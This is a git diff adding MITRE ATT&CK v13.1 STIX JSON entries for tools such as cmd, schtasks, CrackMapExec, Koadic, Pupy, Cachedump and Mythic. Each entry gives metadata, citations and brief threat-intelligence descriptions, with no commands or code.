diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--bba595da-b73a-4354-aa6c-224d4de7cb4e.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--bba595da-b73a-4354-aa6c-224d4de7cb4e.json
new file mode 100644
index 0000000000000000000000000000000000000000..7090a0b47dcd2055d105be58c7ba57e9107ffc90
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--bba595da-b73a-4354-aa6c-224d4de7cb4e.json
@@ -0,0 +1,64 @@
+{
+ "type": "bundle",
+ "id": "bundle--68817bfd-e12b-429a-9d70-778dbcc19737",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-13T20:24:11.194Z",
+ "name": "cmd",
+ "description": "[cmd](https://attack.mitre.org/software/S0106) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd)\n\nCmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., dir (Citation: TechNet Dir)), deleting files (e.g., del (Citation: TechNet Del)), and copying files (e.g., copy (Citation: TechNet Copy)).",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_version": "1.2",
+ "x_mitre_aliases": [
+ "cmd",
+ "cmd.exe"
+ ],
+ "type": "tool",
+ "id": "tool--bba595da-b73a-4354-aa6c-224d4de7cb4e",
+ "created": "2017-05-31T21:33:05.319Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0106",
+ "external_id": "S0106"
+ },
+ {
+ "source_name": "TechNet Cmd",
+ "description": "Microsoft. (n.d.). Cmd. Retrieved April 18, 2016.",
+ "url": "https://technet.microsoft.com/en-us/library/bb490880.aspx"
+ },
+ {
+ "source_name": "TechNet Copy",
+ "description": "Microsoft. (n.d.). Copy. Retrieved April 26, 2016.",
+ "url": "https://technet.microsoft.com/en-us/library/bb490886.aspx"
+ },
+ {
+ "source_name": "TechNet Del",
+ "description": "Microsoft. (n.d.). Del. Retrieved April 22, 2016.",
+ "url": "https://technet.microsoft.com/en-us/library/cc771049.aspx"
+ },
+ {
+ "source_name": "TechNet Dir",
+ "description": "Microsoft. (n.d.). Dir. 
Retrieved April 18, 2016.",
+ "url": "https://technet.microsoft.com/en-us/library/cc755121.aspx"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c11ac61d-50f4-444f-85d8-6f006067f0de.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c11ac61d-50f4-444f-85d8-6f006067f0de.json
new file mode 100644
index 0000000000000000000000000000000000000000..cd0f1a8c658d76051ba5b4c773f4375645a2964e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c11ac61d-50f4-444f-85d8-6f006067f0de.json
@@ -0,0 +1,42 @@
+{
+ "type": "bundle",
+ "id": "bundle--8400d676-c124-4f6f-a4f0-d8b6f8ad6c60",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "tool",
+ "id": "tool--c11ac61d-50f4-444f-85d8-6f006067f0de",
+ "created": "2017-05-31T21:33:04.151Z",
+ "x_mitre_version": "1.1",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "S0103",
+ "url": "https://attack.mitre.org/software/S0103"
+ },
+ {
+ "source_name": "TechNet Route",
+ "url": "https://technet.microsoft.com/en-us/library/bb490991.aspx",
+ "description": "Microsoft. (n.d.). Route. Retrieved April 17, 2016."
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "revoked": false,
+ "description": "[route](https://attack.mitre.org/software/S0103) can be used to find or change information within the local system IP routing table. (Citation: TechNet Route)",
+ "modified": "2022-04-06T15:27:00.668Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "route",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c256da91-6dd5-40b2-beeb-ee3b22ab3d27.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c256da91-6dd5-40b2-beeb-ee3b22ab3d27.json
new file mode 100644
index 0000000000000000000000000000000000000000..70848ca792d1dfead94405d6cd1d62a1cd494350
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c256da91-6dd5-40b2-beeb-ee3b22ab3d27.json
@@ -0,0 +1,51 @@
+{
+ "type": "bundle",
+ "id": "bundle--cf65dbdb-dba5-4e3f-b175-6aad12643ce8",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Edward Millington",
+ "Matthew Demaske, Adaptforward"
+ ],
+ "x_mitre_aliases": [
+ "esentutl",
+ "esentutl.exe"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "tool--c256da91-6dd5-40b2-beeb-ee3b22ab3d27",
+ "type": "tool",
+ "created": "2019-09-03T18:25:36.963Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "external_id": "S0404",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0404"
+ },
+ {
+ "description": "Microsoft. (2016, August 30). Esentutl. Retrieved September 3, 2019.",
+ "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh875546(v=ws.11)",
+ "source_name": "Microsoft Esentutl"
+ }
+ ],
+ "modified": "2021-10-01T17:48:10.492Z",
+ "name": "esentutl",
+ "description": "[esentutl](https://attack.mitre.org/software/S0404) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.(Citation: Microsoft Esentutl)",
+ "x_mitre_version": "1.2",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c4810609-7da6-48ec-8057-1b70a7814db0.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c4810609-7da6-48ec-8057-1b70a7814db0.json
new file mode 100644
index 0000000000000000000000000000000000000000..bba1aaef43236d8a573835799708ba81169f6707
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c4810609-7da6-48ec-8057-1b70a7814db0.json
@@ -0,0 +1,46 @@
+{
+ "type": "bundle",
+ "id": "bundle--d7edc188-938d-40bb-9459-e98925f7b1ae",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_aliases": [
+ "CrackMapExec"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "tool--c4810609-7da6-48ec-8057-1b70a7814db0",
+ "type": "tool",
+ "created": "2020-07-17T14:23:05.958Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "external_id": "S0488",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0488"
+ },
+ {
+ "source_name": "CME Github September 2018",
+ "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference",
+ "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020."
+ }
+ ],
+ "modified": "2020-07-29T20:19:40.544Z",
+ "name": "CrackMapExec",
+ "description": "[CrackMapExec](https://attack.mitre.org/software/S0488), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://attack.mitre.org/software/S0488) collects Active Directory information to conduct lateral movement through targeted networks.(Citation: CME Github September 2018)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c8655260-9f4b-44e3-85e1-6538a5f6e4f4.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c8655260-9f4b-44e3-85e1-6538a5f6e4f4.json
new file mode 100644
index 0000000000000000000000000000000000000000..910148342d6ec30d4c0c22e456591a4c81e05242
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c8655260-9f4b-44e3-85e1-6538a5f6e4f4.json 
@@ -0,0 +1,62 @@
+{
+ "type": "bundle",
+ "id": "bundle--218898a5-3656-4ff1-8465-75a314e4d065",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_aliases": [
+ "Koadic"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "tool",
+ "id": "tool--c8655260-9f4b-44e3-85e1-6538a5f6e4f4",
+ "created": "2018-10-17T00:14:20.652Z",
+ "x_mitre_version": "2.0",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "S0250",
+ "url": "https://attack.mitre.org/software/S0250"
+ },
+ {
+ "source_name": "Koadic",
+ "description": "(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)"
+ },
+ {
+ "source_name": "MalwareBytes LazyScripter Feb 2021",
+ "url": "https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf",
+ "description": "Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021."
+ },
+ {
+ "source_name": "Palo Alto Sofacy 06-2018",
+ "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
+ "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018."
+ },
+ {
+ "source_name": "Github Koadic",
+ "url": "https://github.com/zerosum0x0/koadic",
+ "description": "Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018."
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "revoked": false,
+ "description": "[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. 
[Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.(Citation: Github Koadic)(Citation: Palo Alto Sofacy 06-2018)(Citation: MalwareBytes LazyScripter Feb 2021)",
+ "modified": "2022-04-06T19:32:33.511Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Koadic",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c9703cd3-141c-43a0-a926-380082be5d04.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c9703cd3-141c-43a0-a926-380082be5d04.json
new file mode 100644
index 0000000000000000000000000000000000000000..f433b1639fe665158fe3573c3f5fa5f9fe82d9a3
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c9703cd3-141c-43a0-a926-380082be5d04.json
@@ -0,0 +1,49 @@
+{
+ "type": "bundle",
+ "id": "bundle--5a2fc3d6-fe1f-47ef-b812-f531e75c24ea",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_aliases": [
+ "schtasks",
+ "schtasks.exe"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "tool",
+ "id": "tool--c9703cd3-141c-43a0-a926-380082be5d04",
+ "created": "2017-05-31T21:33:07.218Z",
+ "x_mitre_version": "1.2",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "S0111",
+ "url": "https://attack.mitre.org/software/S0111"
+ },
+ {
+ "source_name": "TechNet Schtasks",
+ "url": "https://technet.microsoft.com/en-us/library/bb490996.aspx",
+ "description": "Microsoft. (n.d.). Schtasks. Retrieved April 28, 2016."
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "revoked": false,
+ "description": "[schtasks](https://attack.mitre.org/software/S0111) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. (Citation: TechNet Schtasks)",
+ "modified": "2022-04-20T20:04:22.896Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "schtasks",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c9cd7ec9-40b7-49db-80be-1399eddd9c52.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c9cd7ec9-40b7-49db-80be-1399eddd9c52.json
new file mode 100644
index 0000000000000000000000000000000000000000..9c5f03b17a938f483cb438cbb354dacbaf0a31d3
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c9cd7ec9-40b7-49db-80be-1399eddd9c52.json
@@ -0,0 +1,46 @@
+{
+ "type": "bundle",
+ "id": "bundle--111a8e22-a211-4847-b1f3-ec1a6841bb18",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_aliases": [
+ "Cachedump"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "tool--c9cd7ec9-40b7-49db-80be-1399eddd9c52",
+ "type": "tool",
+ "created": "2017-05-31T21:33:10.197Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0119",
+ "external_id": "S0119"
+ },
+ {
+ "source_name": "Mandiant APT1",
+ "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+ }
+ ],
+ "modified": "2020-03-30T15:15:36.756Z",
+ "name": "Cachedump",
+ "description": "[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that program extracts cached password hashes from a system\u2019s registry. (Citation: Mandiant APT1)",
+ "x_mitre_version": "1.1",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ca656c25-44f1-471b-9d9f-e2a3bbb84973.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ca656c25-44f1-471b-9d9f-e2a3bbb84973.json
new file mode 100644
index 0000000000000000000000000000000000000000..1b10e9339c3222378b22e86a9721a3f3b66a746d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ca656c25-44f1-471b-9d9f-e2a3bbb84973.json
@@ -0,0 +1,54 @@
+{
+ "type": "bundle",
+ "id": "bundle--66773990-162a-4de9-89ce-061caf9bdf57",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Matthew Demaske, Adaptforward"
+ ],
+ "x_mitre_aliases": [
+ "Expand"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "tool--ca656c25-44f1-471b-9d9f-e2a3bbb84973",
+ "type": "tool",
+ "created": "2019-02-19T19:17:14.971Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "external_id": "S0361",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0361"
+ },
+ {
+ "source_name": "Microsoft Expand Utility",
+ "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand",
+ "description": "Microsoft. (2017, October 15). Expand. Retrieved February 19, 2019."
+ },
+ {
+ "url": "http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/",
+ "description": "Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.",
+ "source_name": "Palo Alto Networks BBSRAT"
+ }
+ ],
+ "modified": "2020-03-20T18:43:16.989Z",
+ "name": "Expand",
+ "description": "[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files.(Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)",
+ "x_mitre_version": "1.1",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cb69b20d-56d0-41ab-8440-4a4b251614d4.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cb69b20d-56d0-41ab-8440-4a4b251614d4.json
new file mode 100644
index 0000000000000000000000000000000000000000..8ca43b920d63a832be823b6f1f91797e59871176
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cb69b20d-56d0-41ab-8440-4a4b251614d4.json
@@ -0,0 +1,49 @@
+{
+ "type": "bundle",
+ "id": "bundle--10b9fd72-7c13-4445-a94c-385e0c58a234",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS",
+ "Android"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_aliases": [
+ "Pupy"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "tool--cb69b20d-56d0-41ab-8440-4a4b251614d4",
+ "type": "tool",
+ "created": "2018-04-18T17:59:24.739Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0192",
+ "external_id": "S0192"
+ },
+ {
+ "source_name": "GitHub Pupy",
+ "description": "Nicolas Verdier. (n.d.). Retrieved January 29, 2018.",
+ "url": "https://github.com/n1nj4sec/pupy"
+ }
+ ],
+ "modified": "2020-05-13T22:57:00.921Z",
+ "name": "Pupy",
+ "description": "[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)",
+ "x_mitre_version": "1.2",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f.json
new file mode 100644
index 0000000000000000000000000000000000000000..4ba79a1e82ecc65d79e3ac48018c2286ac3ded00
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f.json
@@ -0,0 +1,54 @@
+{
+ "type": "bundle",
+ "id": "bundle--49c7c039-96fd-4438-9977-0b463876ca09",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-13T20:23:35.333Z",
+ "name": "Reg",
+ "description": "[Reg](https://attack.mitre.org/software/S0075) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg)\n\nUtilities such as [Reg](https://attack.mitre.org/software/S0075) are known to be used by persistent threats. (Citation: Windows Commands JPCERT)",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "Reg",
+ "reg.exe"
+ ],
+ "type": "tool",
+ "id": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
+ "created": "2017-05-31T21:32:49.000Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0075",
+ "external_id": "S0075"
+ },
+ {
+ "source_name": "Microsoft Reg",
+ "description": "Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.",
+ "url": "https://technet.microsoft.com/en-us/library/cc732643.aspx"
+ },
+ {
+ "source_name": "Windows Commands JPCERT",
+ "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.",
+ "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cf23bf4a-e003-4116-bbae-1ea6c558d565.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cf23bf4a-e003-4116-bbae-1ea6c558d565.json
new file mode 100644
index 0000000000000000000000000000000000000000..cfcd6e05c696ef9f7649103a89e042dbe02261e2
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cf23bf4a-e003-4116-bbae-1ea6c558d565.json
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--7c04f652-8713-4a25-a499-61db683068c6", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "ftp", + "ftp.exe" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--cf23bf4a-e003-4116-bbae-1ea6c558d565", + "type": "tool", + "created": "2017-05-31T21:33:00.565Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0095", + "external_id": "S0095" + }, + { + "source_name": "Microsoft FTP", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftp", + "description": "Microsoft. (2021, July 21). ftp. Retrieved February 25, 2022." + }, + { + "source_name": "Linux FTP", + "url": "https://linux.die.net/man/1/ftp", + "description": "N/A. (n.d.). ftp(1) - Linux man page. Retrieved February 25, 2022." + } + ], + "modified": "2022-03-07T22:20:18.809Z", + "name": "ftp", + "description": "[ftp](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.(Citation: Microsoft FTP)(Citation: Linux FTP)", + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d505fc8b-2e64-46eb-96d6-9ef7ffca5b66.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d505fc8b-2e64-46eb-96d6-9ef7ffca5b66.json new file mode 100644 index 0000000000000000000000000000000000000000..e8ead71b4dd3d2a57d8b1ea8e930a40dff94c3cd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d505fc8b-2e64-46eb-96d6-9ef7ffca5b66.json 
@@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--bcddad4e-a10e-46bc-9a51-a51de823d4c8", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Cody Thomas, SpecterOps" + ], + "x_mitre_aliases": [ + "Mythic" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--d505fc8b-2e64-46eb-96d6-9ef7ffca5b66", + "created": "2022-03-26T01:38:12.966Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0699", + "url": "https://attack.mitre.org/software/S0699" + }, + { + "source_name": "RecordedFuture 2021 Ad Infra", + "url": "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", + "description": "Insikt Group. (2022, January 18). 2021 Adversary Infrastructure Report. Retrieved March 25, 2022." + }, + { + "source_name": "Mythic Github", + "url": "https://github.com/its-a-feature/Mythic", + "description": "Thomas, C. (2018, July 4). Mythic. Retrieved March 25, 2022." + }, + { + "source_name": "Mythic SpecterOps", + "url": "https://posts.specterops.io/a-change-of-mythic-proportions-21debeb03617", + "description": "Thomas, C. (2020, August 13). A Change of Mythic Proportions. Retrieved March 25, 2022." + }, + { + "source_name": "Mythc Documentation", + "url": "https://docs.mythic-c2.net/", + "description": "Thomas, C. (n.d.). Mythc Documentation. Retrieved March 25, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Mythic](https://attack.mitre.org/software/S0699) is an open source, cross-platform post-exploitation/command and control platform. 
[Mythic](https://attack.mitre.org/software/S0699) is designed to \"plug-n-play\" with various agents and communication channels.(Citation: Mythic Github)(Citation: Mythic SpecterOps)(Citation: Mythc Documentation) Deployed [Mythic](https://attack.mitre.org/software/S0699) C2 servers have been observed as part of potentially malicious infrastructure.(Citation: RecordedFuture 2021 Ad Infra)", + "modified": "2022-04-18T15:41:53.146Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mythic", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d5e96a35-7b0b-4c6a-9533-d63ecbda563e.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d5e96a35-7b0b-4c6a-9533-d63ecbda563e.json new file mode 100644 index 0000000000000000000000000000000000000000..7e763c7b1f70c8c0e0ec8244e5a058a997a17a03 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d5e96a35-7b0b-4c6a-9533-d63ecbda563e.json 
